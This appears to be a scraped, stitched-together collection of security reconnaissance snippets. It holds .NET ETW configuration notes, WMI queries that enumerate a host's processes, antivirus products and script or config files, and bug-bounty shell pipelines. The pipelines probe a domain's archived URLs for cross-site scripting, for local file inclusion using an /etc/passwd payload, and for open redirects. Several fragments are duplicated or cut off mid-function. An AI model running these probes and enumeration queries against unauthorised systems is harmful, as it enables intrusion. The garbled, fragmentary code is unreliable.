- The .NET Runtime Event Provider requires setting COMPLUS_ETWEnabled=1 in your process' environment.
- CLRConfig will look for configurations in the following places in the following order:
- Look at environment variables (prepending COMPlus_ to the name)
- Look at the framework registry keys (HKCU\Software\Microsoft\.NETFramework)
- Look at the framework registry keys (HKLM\Software\Microsoft\.NETFramework)
- These can be set in the following ways:
- Setting the environment variable COMPlus_:
- Windows
SELECT System.ItemPathDisplay,System.FileOwner,System.Size,System.DateCreated,System.DateAccessed,System.Search.Autosummary FROM SystemIndex WHERE Contains(*, '""*{0}*""') AND SCOPE = '{1}' AND (System.FileExtension = '.txt' OR System.FileExtension = '.doc' OR System.FileExtension = '.docx' OR System.FileExtension = '.ppt' OR System.FileExtension = '.pptx' OR System.FileExtension = '.xls' OR System.FileExtension = '.xlsx' OR System.FileExtension = '.ps1' OR System.FileExtension = '.vbs' OR System.FileExtension = '.config' OR System.FileExtension = '.ini')" | |
SELECT * FROM win32_networkconnection" | |
Select * from Win32_ComputerSystem" | |
SELECT * FROM Win32_DeviceGuard" | |
SELECT * FROM win32_service" | |
SELECT * FROM AntiVirusProduct" | |
SELECT * FROM MSFT_DNSClientCache" | |
SELECT ProcessId, ExecutablePath, CommandLine FROM Win32_Process" | |
SELECT * FROM Win32_Process" | |
SELECT * FROM Win32_Process WHERE SessionID != 0" |
#!/bin/env python | |
# Credits goes to @sw33tLie | |
from ipaddress import ip_network, ip_address | |
# Hard-coded snapshot of Cloudflare IPv4 ranges (no IPv6 entries are listed).
# NOTE(review): a static list goes stale; compare it with the provider's
# currently published ranges before relying on it for a security decision.
cidrs = [
    "173.245.48.0/20",
    "103.21.244.0/22",
    "103.22.200.0/22",
    "103.31.4.0/22",
    "141.101.64.0/18",
    "108.162.192.0/18",
    "190.93.240.0/20",
    "188.114.96.0/20",
    "197.234.240.0/22",
    "198.41.128.0/17",
    "162.158.0.0/15",
    "104.16.0.0/12",
    "172.64.0.0/13",
    "131.0.72.0/22",
]
def is_cloudflare(ip): | |
for cidr in cidrs: | |
net = ip_network(cidr) |
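# For every archived URL of the domain, list the JavaScript variable names the
# page declares and print them as candidate query parameters ("name=xss").
#
# The URLs come from third-party archives (gau) and are untrusted input:
#   - read -r keeps backslashes in a URL literal;
#   - "$url" is quoted so whitespace or glob characters cannot split it;
#   - printf '%s' prints the URL verbatim, where echo -e would interpret escape
#     sequences embedded in it and let a crafted URL drive the terminal.
# Fixed from the original: the character class read "Zo-9" (letter o) instead
# of "Z0-9", and ":" stood where ";" was needed before the echo.
# NOTE(review): "$url" is still interpolated into the sed program below, so a
# URL containing "," or "&" alters the substitution; and the pattern " var"
# (leading space) does not match grep's "var name" output. Confirm the intended
# rewrite before relying on the result.
assetfinder site.com \
  | gau \
  | grep -Ev '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' \
  | while read -r url; do
      vars=$(curl -s "$url" \
        | grep -Eo "var [a-zA-Z0-9_]+" \
        | sed -e 's, 'var','"$url"?',g' -e 's/ //g' \
        | grep -v '.js' \
        | sed 's/.*/&=xss/g')
      printf '\e[1;33m%s\n \e[1;32m%s\n' "$url" "$vars"
    done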
nucleir() { | |
local TPL="$HOME/Documents/nuclei-templates" | |
[[ -z "${1}" ]] && { echo "-target/-l ?"; return; } | |
[[ -z "${2}" ]] && { echo "Input target?"; return; } | |
for i in `ls -1d ${TPL}/*/`; do | |
if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then | |
nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt" | |
fi |
nucleir() { | |
local TPL="$HOME/Documents/nuclei-templates" | |
[[ -z "${1}" ]] && { echo "-target/-l ?"; return; } | |
[[ -z "${2}" ]] && { echo "Input target?"; return; } | |
for i in `ls -1d ${TPL}/*/`; do | |
if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then | |
nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt" | |
fi |
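#######################################
# Check archived URLs of a domain for local file inclusion: every query value
# is replaced with /etc/passwd and responses containing "root:x" are reported.
# Arguments: $1 - domain handed to gau
# Outputs:   "VULN! <url>" on stdout for each matching response
#######################################
lfi() {
  # The URLs come from third-party archives and are untrusted. Each one is
  # passed to the child shell as positional parameter $1 instead of being
  # pasted into the script text, so quotes, backticks or $(...) inside a URL
  # are never evaluated as shell code on the machine running the check.
  # The placeholder is {} (not %) so it cannot collide with printf's %s.
  gau "$1" \
    | gf lfi \
    | qsreplace "/etc/passwd" \
    | xargs -I '{}' -P 25 sh -c \
        'curl -s "$1" 2>&1 | grep -q "root:x" && printf "VULN! %s\n" "$1"' _ '{}'
}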
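#######################################
# Check archived URLs of a domain for open redirects: every query value is
# replaced with a marker host and responses whose Location header points at
# that host are reported.
# Arguments: $1 - domain handed to gau
# Outputs:   "VULN! <url>" on stdout for each matching response
#######################################
open-redirect() {
  local LHOST="http://localhost"
  # Two fixes over the original:
  #  - LHOST is a local, unexported variable, so "$LHOST" inside the
  #    single-quoted child script expanded to nothing and any Location header
  #    matched. It is now passed explicitly as $2.
  #  - The untrusted URL is passed as $1 instead of being substituted into the
  #    script text, so shell metacharacters in it are never executed.
  # grep -F matches the marker literally; -i also accepts "location:" as sent
  # in lower case by some servers.
  gau "$1" \
    | gf redirect \
    | qsreplace "$LHOST" \
    | xargs -I '{}' -P 25 sh -c \
        'curl -Is "$1" 2>&1 | grep -qiF "Location: $2" && printf "VULN! %s\n" "$1"' _ '{}' "$LHOST"
}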
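# Open every entry of urls.txt in a browser. An entry that already carries an
# http:// or https:// scheme is opened as-is; any other entry is opened as both
# http:// and https://. Blank lines are skipped.
#
# The scheme test is anchored (^https?://) rather than "contains http", so every
# argument handed to the browser starts with a scheme and a line beginning with
# "-" cannot be taken as a browser option. The list is kept in an array so URLs
# containing ?, * or spaces are not re-split or glob-expanded by the shell.
urls=()
while IFS= read -r line; do
  urls+=("$line")
done < <(awk 'NF { if ($1 ~ /^https?:\/\//) print $1; else { print "http://" $1; print "https://" $1 } }' urls.txt)

firefox "${urls[@]}"
chromium-browser "${urls[@]}"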
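#######################################
# Open every entry of a URL list in Firefox. Entries with an http:// or
# https:// scheme are opened as-is; any other entry is opened as both http://
# and https://. Blank lines are skipped.
# Arguments: $1 - path to a file with one URL or host per line
# Returns:   1 if the file cannot be read, otherwise firefox's status
#            (0 without launching when the list is empty)
#######################################
oopen() {
  local list=${1:-} line
  local -a urls=()

  if [[ ! -r "$list" ]]; then
    printf 'oopen: cannot read %s\n' "$list" >&2
    return 1
  fi

  # The original left the backtick substitution unclosed, so the function did
  # not parse. The scheme test is anchored so every browser argument starts
  # with http(s):// and a line beginning with "-" is never taken as an option.
  while IFS= read -r line; do
    urls+=("$line")
  done < <(awk 'NF { if ($1 ~ /^https?:\/\//) print $1; else { print "http://" $1; print "https://" $1 } }' "$list")

  (( ${#urls[@]} )) || return 0
  firefox "${urls[@]}"
}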
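# List the ASN numbers whose organisation name matches "airbnb" in the
# GeoLite2 ASN CSV archive, downloading the archive once if it is not cached.
#
# The archive is kept in a per-user cache directory instead of a fixed name in
# /tmp, where another local user could place a file of the same name first and
# have it parsed in place of the real download. The "ls ... | grep X" trick
# used only to silence output is replaced by a plain existence test.
cache_dir="${XDG_CACHE_HOME:-$HOME/.cache}/geolite2"
zip_file="$cache_dir/GeoLite2-ASN-CSV.zip"
mkdir -p -- "$cache_dir"
if [[ ! -f "$zip_file" ]]; then
  wget --quiet -P "$cache_dir" "https://geolite.maxmind.com/download/geoip/database/GeoLite2-ASN-CSV.zip"
fi
unzip -c "$zip_file" | grep -i airbnb | cut -d ',' -f 2 | sort -fu

# Alternative: ask amass for the ASNs registered to an organisation.
amass intel -org paypal | cut -d ',' -f 1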
output: | |
133850 | |
137437 | |
206695 | |
206704 |
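# Print each URL from plainurls.txt padded to 100 columns, followed by the
# first line of its HTTP response headers, or "KO" when curl fails or times
# out after 5 seconds.
#
# read -r keeps backslashes in a URL literal, and the subshell is written as
# "$( { ...; } | ...)" because "$((" can be read as the start of an arithmetic
# expansion. curl -k skips certificate verification, so the status line shown
# is unauthenticated; treat it as a reachability hint only.
while read -r u; do
  status=$( { curl -I -s -m 5 -k "$u" || echo KO; } | head -n 1)
  printf '%-100s-> %s\n' "$u" "$status"
done < plainurls.txt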
From a json file: | |
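# Same status check, with the URLs taken from waybackurls.json.
# NOTE(review): the grep/cut stage assumes jq prints each URL as a quoted
# string on its own line; confirm against the actual JSON layout.
#
# read -r keeps backslashes in a URL literal, and the subshell is written as
# "$( { ...; } | ...)" because "$((" can be read as the start of an arithmetic
# expansion. curl -k skips certificate verification, so the status line shown
# is unauthenticated; treat it as a reachability hint only.
jq -r '.[]' waybackurls.json \
  | grep 'http' \
  | cut -d '"' -f 2 \
  | while read -r u; do
      status=$( { curl -I -s -m 5 -k "$u" || echo KO; } | head -n 1)
      printf '%-100s-> %s\n' "$u" "$status"
    done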
Using parallel to speed up the process: | |
# Same status check fanned out over 20 concurrent jobs; "#" is the placeholder
# that parallel replaces with each line of plainurls.txt.
parallel -j 20 -I# 'echo "$(printf "%-100s" "#") -> $((curl -I -s -m 5 -k "#"||echo KO)|head -n 1 -)"' < plainurls.txt
function otestu { | |
cat $1 | parallel -j 20 -I# 'echo "$(printf "%-100s" "#") -> $((curl -I -s -m 5 -k "#"||echo KO)|head -n 1 -)"' |